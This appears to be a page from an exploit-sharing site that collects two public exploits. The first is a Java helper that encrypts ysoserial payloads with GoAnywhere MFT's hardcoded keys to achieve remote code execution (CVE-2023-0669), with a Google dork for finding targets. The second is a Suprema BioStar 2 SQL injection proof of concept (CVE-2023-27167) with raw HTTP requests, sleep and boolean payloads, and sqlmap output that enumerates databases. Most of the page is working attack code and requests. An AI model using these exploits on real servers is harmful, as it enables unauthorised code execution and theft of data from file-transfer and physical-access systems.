// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) // Google Dork: title:"GoAnywhere" // Date: 3/26/2023 // Exploit Author: Youssef Muhammad // Vendor Homepage: https://www.goanywhere.com/ // Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0 // Version: > 7.1.1 for windows / > 7.0.3 for Linux // Tested on: Windows, Linux // CVE : CVE-2023-0669 // This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution import java.util.Base64; import javax.crypto.Cipher; import java.nio.charset.StandardCharsets; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.PBEKeySpec; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import java.nio.file.Files; import java.nio.file.Paths; public class CVE_2023_0669_helper { static String ALGORITHM = "AES/CBC/PKCS5Padding"; static byte[] KEY = new byte[30]; static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8); public static void main(String[] args) throws Exception { if (args.length != 2) { System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>"); System.exit(1); } String filePath = args[0]; String version = args[1]; byte[] fileContent = Files.readAllBytes(Paths.get(filePath)); String encryptedContent = encrypt(fileContent, version); System.out.println(encryptedContent); } public static String encrypt(byte[] data, String version) throws Exception { Cipher cipher = Cipher.getInstance(ALGORITHM); KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue(); SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES"); IvParameterSpec ivSpec = new IvParameterSpec(IV); cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec); byte[] encryptedObject = cipher.doFinal(data); String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject); String v = (version.equals("2")) ? "$2" : ""; bundle += v; return bundle; } private static byte[] getInitializationValue() throws Exception { // Version 1 Encryption String param1 = "go@nywhereLicenseP@$$wrd"; byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85}; return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded(); } private static byte[] getInitializationValueV2() throws Exception { // Version 2 Encryption String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R"; byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73}; return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded(); } }
HireHackking

Suprema BioStar 2 v2.8.16 - SQL Injection

HACKER · %s · %s

# Exploit Title: Suprema BioStar 2 v2.8.16 - SQL Injection # Date: 26/03/2023 # Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/) # Vendor Homepage: https://www.supremainc.com/ # Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp # Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide # Version: 2.8.16 # Tested on: Windows, Linux # CVE-2023-27167 ## Description A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter. ## Request PoC #1 ''' POST /api/users/absence?search_month=1 HTTP/1.1 Host: biostar2.server.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json, text/plain, */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/json;charset=UTF-8 content-language: en bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548 Content-Length: 204 Origin: https://biostar2.server.net Connection: close Referer: https://biostar2.server.net/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}} ''' Time based SQL injection (set 4 – response delays for 8 seconds). ''' ## Request PoC #2 ''' POST /api/users/absence?search_month=1 HTTP/1.1 Host: biostar2.server.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json, text/plain, */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/json;charset=UTF-8 content-language: en bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548 Content-Length: 188 Origin: https://biostar2.server.net Connection: close Referer: https://biostar2.server.net/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}} ''' Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin) ''' ## Exploit with SQLmap Save the request from Burp Suite to file. ''' --- Parameter: JSON #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}} Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}} --- [05:02:49] [INFO] testing MySQL [05:02:49] [INFO] confirming MySQL [05:02:50] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL > 5.0.0 (MariaDB fork) [05:02:50] [INFO] fetching database names [05:02:50] [INFO] fetching number of databases [05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [05:02:55] [INFO] retrieved: 2 [05:03:12] [INFO] retrieved: biostar2_ac [05:03:56] [INFO] retrieved: information_schema available databases [2]: [*] biostar2_ac [*] information schema '''